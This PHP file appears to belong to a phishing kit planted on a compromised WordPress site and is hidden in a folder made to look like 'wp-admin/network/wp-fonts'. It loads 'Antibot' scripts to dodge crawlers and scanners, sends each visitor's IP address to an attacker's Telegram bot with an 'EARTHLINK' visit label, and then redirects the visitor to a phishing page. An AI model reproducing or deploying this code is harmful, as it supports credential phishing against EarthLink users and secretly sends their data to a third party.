File: /home/enciassa/www/wp-admin/network/wp-fonts/kj/ef83a150d01a5a45af785d3f1bd46726/index.php
<?php
include('Antibot/blockers.php');
include('Antibot/detects.php');
include('Antibot/new.php');
include('Antibot/Bot-Crawler.php');
include('Antibot/Dila_DZ.php');
include '../blocker.php';
include '../config.php';
$ip = getenv("REMOTE_ADDR");
$message = "+--------👀📫EARTHLINK--VISITTT--------+\n\nClient IP: "
.$ip.
"\n\nClient Host: "
.$hostname.
"\n\n"
;
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = [
'chat_id' => $chatId,
'text' => $message
];
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if (curl_errno($ch)) {
echo 'Error:' . curl_error($ch);
} else {
header("Location: -=+h=.htm?ip=$ip");
}
curl_close($ch);
header("Location: -=+h=.htm?ip=$ip");
session_start();
?>